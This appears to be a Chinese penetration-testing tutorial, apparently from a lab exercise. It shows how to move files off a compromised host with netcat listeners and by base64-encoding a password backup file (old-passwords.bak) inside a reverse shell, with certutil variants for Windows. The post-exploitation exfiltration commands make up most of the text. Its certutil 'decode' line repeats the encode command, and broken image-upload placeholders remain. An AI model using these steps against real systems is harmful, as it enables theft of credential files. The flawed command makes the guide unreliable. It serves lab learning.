【主机渗透】通过nc、或者base64编码从服务器上上传、下载文件

通过nc从目标机上上传、下载文件：

1、下载文件，文件在192.168.110.2服务器上，下载文件到192.168.110.1服务器

// 在 192.168.110.2（这台主机监听 5555 端口（注意符号是 "<" ）
# nc -l 5555 < download.txt
​
// 在 192.168.110.1 这台主机下载文件（注意符号是 ">" ）
# nc --recv-only 192.168.110.2 5555 > download.txt

2、上传文件，文件在192.168.110.1服务器上，上传文件到192.168.110.2服务器

// 在 192.168.110.2 这台主机监听 5555 端口（注意符号是 ">" ）
# nc -l 5555 > upload.txt
​
// 在 192.168.110.1 这台主机上传文件（注意符号是 "<" ）
# nc --send-only 192.168.110.2 5555 < upload.txt

 

通过base64编码的方式在反弹的shell上上传、下载文件：

环境：

目标机：Debian 4.9.30，ip：192.168.110.2，目标文件：/home/jim/backups/old-passwords.bak

下载机：kali 2020

下载步骤：

1、在已连接的shell上，对目标文件进行base64编码

base64 old-passwords.bak

正在上传…重新上传取消

base64工具语法：

• 对字符串编码、解码：

# 编码
echo -n "hello" | base64
# 解码
echo -n "hello" | base64 -d

• 对文件内容编码、解码：

# 编码
base64 file.txt
# 解码
base64 -d file.txt

如果目标机是windows系统，可使用windows自带的certutil.exe工具进行base64编码，命令如下：

# 编码
certutil -encode originalFile.txt targetFile.txt
# 解码
certutil -encode originalFile.txt targetFile.txt

2、将base64编码保存到一个txt文件下，并执行解码命令

base64 -d pass.txt

正在上传…重新上传取消

上传文件同理